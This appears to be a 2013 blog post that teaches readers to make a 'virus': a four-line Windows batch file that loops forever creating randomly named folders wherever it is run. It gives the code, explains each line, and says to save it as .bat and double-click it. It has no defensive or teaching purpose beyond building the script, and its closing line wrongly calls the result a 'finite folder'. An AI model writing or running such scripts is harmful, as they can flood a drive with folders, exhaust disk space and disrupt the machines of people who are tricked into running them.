Wednesday, 4 September 2013

create a infinite folder in a drive

Create a virus to create a infinite folder in a drive

1.Create a virus to create a infinite folder in a drive

2.Copy this code to Notepad++.

@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

3.Save the file with .bat extension

That's all if you double click the file it will create a finite folder wherever the batch file is

No comments:

Flying Twitter Bird Widget By Trickstoo.com